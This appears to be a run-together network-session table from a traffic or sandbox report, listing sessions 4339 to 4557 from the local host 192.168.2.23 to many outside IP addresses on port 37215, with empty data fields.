                                          4339192.168.2.233465441.147.35.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4340192.168.2.233968841.27.147.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4341192.168.2.2337104157.107.55.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4342192.168.2.2347598157.154.13.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4343192.168.2.2338294103.34.71.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4344192.168.2.234320641.247.155.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4345192.168.2.2344024157.115.71.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4346192.168.2.2337356197.85.10.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4347192.168.2.235856041.169.239.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4348192.168.2.2352786197.137.196.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4349192.168.2.2335562157.171.232.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4350192.168.2.2356018160.186.170.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4351192.168.2.2341314157.189.232.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4352192.168.2.234426039.116.111.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4353192.168.2.234201241.177.104.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4354192.168.2.235533641.101.167.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4355192.168.2.235223082.190.28.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4356192.168.2.2348980171.103.125.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4357192.168.2.234084241.223.16.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4358192.168.2.2360232197.253.158.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4359192.168.2.2349094141.215.228.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4360192.168.2.235918441.121.238.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4361192.168.2.2350144146.156.85.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4362192.168.2.2347076197.2.228.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4363192.168.2.2336752154.147.89.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4364192.168.2.2339302144.191.183.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4365192.168.2.233697041.99.83.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4366192.168.2.2336604157.242.12.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4367192.168.2.235964877.145.39.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4368192.168.2.2344338147.33.173.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4369192.168.2.2334650157.143.47.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4370192.168.2.2352516197.209.139.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4371192.168.2.2354380157.198.184.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4372192.168.2.235143452.70.254.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4373192.168.2.233439218.32.157.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4374192.168.2.235736241.248.159.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4375192.168.2.233418441.115.113.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4376192.168.2.2342284197.101.62.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4377192.168.2.2334960197.231.63.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4378192.168.2.235703641.22.19.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4379192.168.2.2337882197.150.150.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4380192.168.2.2335330197.166.94.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4381192.168.2.233440841.254.144.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4382192.168.2.234637641.85.206.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4383192.168.2.235092881.162.160.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4384192.168.2.2335250197.128.177.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4385192.168.2.2337084157.85.76.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4386192.168.2.2351726197.105.45.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4387192.168.2.2349622197.233.97.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4388192.168.2.2342618191.101.88.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4389192.168.2.235988441.173.0.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4390192.168.2.2355790157.79.214.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4391192.168.2.2355370197.84.192.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4392192.168.2.2338808197.121.12.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4393192.168.2.2337594197.200.91.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4394192.168.2.2342100157.249.149.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4395192.168.2.2359236197.247.111.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4396192.168.2.2354666150.1.98.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4397192.168.2.2337292197.85.180.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4398192.168.2.233925641.100.2.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4399192.168.2.2334308157.66.211.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4400192.168.2.2355606157.140.222.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4401192.168.2.2353526157.87.42.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4402192.168.2.2343512197.247.227.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4403192.168.2.2350730178.245.200.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4404192.168.2.2344430157.76.203.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4405192.168.2.235713041.221.95.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4406192.168.2.235110641.67.160.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4407192.168.2.2335108157.242.35.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4408192.168.2.234684041.18.178.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4409192.168.2.2346780197.156.76.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4410192.168.2.234031079.19.144.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4411192.168.2.235000641.169.40.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4412192.168.2.2349610157.196.145.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4413192.168.2.235831441.198.41.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4414192.168.2.2352690157.65.56.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4415192.168.2.2338416163.93.126.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4416192.168.2.233525643.7.118.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4417192.168.2.2335570197.211.157.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4418192.168.2.234289434.136.100.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4419192.168.2.233651441.138.88.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4420192.168.2.233971041.209.83.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4421192.168.2.233915851.102.140.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4422192.168.2.2358090197.10.165.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4423192.168.2.2343764157.142.200.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4424192.168.2.235754841.246.54.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4425192.168.2.2347388142.54.131.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4426192.168.2.233860241.43.164.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4427192.168.2.2356414180.207.25.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4428192.168.2.2337030109.106.164.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4429192.168.2.233363441.169.244.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4430192.168.2.2360322157.112.107.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4431192.168.2.2356020157.184.162.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4432192.168.2.2357320157.130.247.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4433192.168.2.2341294157.30.145.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4434192.168.2.2336264197.41.87.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4435192.168.2.234097441.30.142.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4436192.168.2.235685841.205.181.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4437192.168.2.2352384157.200.140.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4438192.168.2.2349612197.67.43.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4439192.168.2.2334178177.215.116.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4440192.168.2.2359930197.240.177.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4441192.168.2.2337234157.96.100.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4442192.168.2.233324494.240.226.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4443192.168.2.234651841.129.186.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4444192.168.2.2346340197.75.154.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4445192.168.2.2359620197.107.250.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4446192.168.2.2350440106.231.119.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4447192.168.2.2344768197.22.33.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4448192.168.2.233733274.62.194.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4449192.168.2.2349014197.15.196.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4450192.168.2.2353926197.94.142.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4451192.168.2.2337708197.7.197.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4452192.168.2.2358354197.43.81.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4453192.168.2.2358168200.249.184.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4454192.168.2.2340926157.114.195.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4455192.168.2.2357284197.47.110.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4456192.168.2.2358222197.212.198.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4457192.168.2.234326441.243.88.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4458192.168.2.2341632138.76.91.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4459192.168.2.2359830197.89.169.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4460192.168.2.2336536157.50.27.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4461192.168.2.2338036100.60.144.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4462192.168.2.2341402197.213.94.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4463192.168.2.2334292157.41.175.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4464192.168.2.234847446.161.19.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4465192.168.2.2340946157.251.169.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4466192.168.2.2339364157.222.103.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4467192.168.2.2347676134.220.78.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4468192.168.2.2360900157.33.183.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4469192.168.2.2354774197.224.81.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4470192.168.2.2358214146.198.218.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4471192.168.2.235887641.239.33.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4472192.168.2.2349582130.6.50.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4473192.168.2.234848441.190.157.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4474192.168.2.234142041.207.173.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4475192.168.2.2352970157.54.70.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4476192.168.2.2354924197.174.132.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4477192.168.2.235094841.185.113.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4478192.168.2.2358788157.75.235.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4479192.168.2.233727441.49.165.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4480192.168.2.236011841.10.145.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4481192.168.2.234238441.105.152.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4482192.168.2.235386841.6.228.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4483192.168.2.2346204197.32.222.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4484192.168.2.233825841.88.58.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4485192.168.2.234345441.6.164.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4486192.168.2.2350922197.238.116.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4487192.168.2.2334344197.209.111.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4488192.168.2.2333844157.238.194.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4489192.168.2.2360786197.75.68.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4490192.168.2.2345290137.93.185.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4491192.168.2.2333028157.12.172.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4492192.168.2.2335314157.205.228.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4493192.168.2.235575241.47.146.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4494192.168.2.2342566197.236.190.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4495192.168.2.234515884.125.200.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4496192.168.2.2351062175.114.215.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4497192.168.2.235457038.225.119.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4498192.168.2.235115241.88.100.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4499192.168.2.234147841.36.83.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4500192.168.2.234480249.188.93.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4501192.168.2.2352962197.124.220.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4502192.168.2.234167641.82.165.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4503192.168.2.2353522157.124.132.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4504192.168.2.2344254190.87.144.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4505192.168.2.2339030197.195.249.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4506192.168.2.2340732197.59.231.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4507192.168.2.234711041.18.73.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4508192.168.2.2350726157.225.248.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4509192.168.2.2332884157.13.154.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4510192.168.2.2353700197.171.17.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4511192.168.2.2358686197.244.147.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4512192.168.2.234732870.146.251.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4513192.168.2.234607069.168.161.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4514192.168.2.233528041.166.19.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4515192.168.2.233501041.142.88.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4516192.168.2.234288241.207.131.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4517192.168.2.2337268197.192.14.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4518192.168.2.2358410197.114.87.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4519192.168.2.2360708157.216.42.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4520192.168.2.2351490157.177.119.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4521192.168.2.2339390157.234.110.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4522192.168.2.235606041.18.115.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4523192.168.2.2338660157.195.35.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4524192.168.2.2336530197.22.174.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4525192.168.2.2358774157.9.125.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4526192.168.2.2356558197.106.205.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4527192.168.2.2335298184.157.106.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4528192.168.2.234194641.152.127.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4529192.168.2.2349186157.68.149.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4530192.168.2.2341512158.159.45.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4531192.168.2.233810041.24.202.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4532192.168.2.233979641.225.238.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4533192.168.2.2359800157.17.60.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4534192.168.2.236089041.203.130.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4535192.168.2.2352668157.183.89.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4536192.168.2.2342550157.27.98.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4537192.168.2.2355648197.89.101.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4538192.168.2.236074086.36.254.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4539192.168.2.235546041.97.143.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4540192.168.2.2342902197.109.245.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4541192.168.2.2340228157.40.254.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4542192.168.2.2352036157.3.73.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4543192.168.2.234751841.27.28.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4544192.168.2.2342208157.164.211.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4545192.168.2.2350148197.155.170.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4546192.168.2.233802641.140.227.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4547192.168.2.2334632197.174.59.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4548192.168.2.2357996157.100.84.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4549192.168.2.2356754157.104.191.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4550192.168.2.233973041.63.90.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4551192.168.2.235580841.72.186.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4552192.168.2.235042441.125.147.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4553192.168.2.235642841.13.26.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4554192.168.2.235990841.198.190.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4555192.168.2.2343974197.143.208.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4556192.168.2.2358924197.77.191.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4557192.168.2.2350892157.89.70.22337215
                                          TimestampBytes transferredDirectionData


